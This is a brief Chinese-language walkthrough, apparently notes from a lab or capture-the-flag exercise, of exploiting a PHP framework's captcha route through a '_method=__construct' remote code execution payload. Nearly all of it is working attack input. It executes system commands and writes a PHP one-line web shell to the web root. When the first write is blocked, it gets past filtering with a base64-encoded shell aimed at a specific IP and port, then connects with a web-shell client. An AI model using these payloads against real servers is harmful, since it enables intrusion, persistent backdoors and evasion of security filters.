访问/index.php?s=captcha
页面,出现报错
执行whoami
查看文件目录
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
写入一句话木马
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo <?php @eval($_POST['root009']); ?> >>/var/www/public/1.php
发现被拦截无法写入,通过base64编码绕过
http:// 159.75.16.25:8089/index.php?s=captcha(POST)_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3Jvb3QwMDknXSk7Pz5iYmI= | base64 -d >>/var/www/public/shell.php
此处手滑多写了两个
用蚁剑连接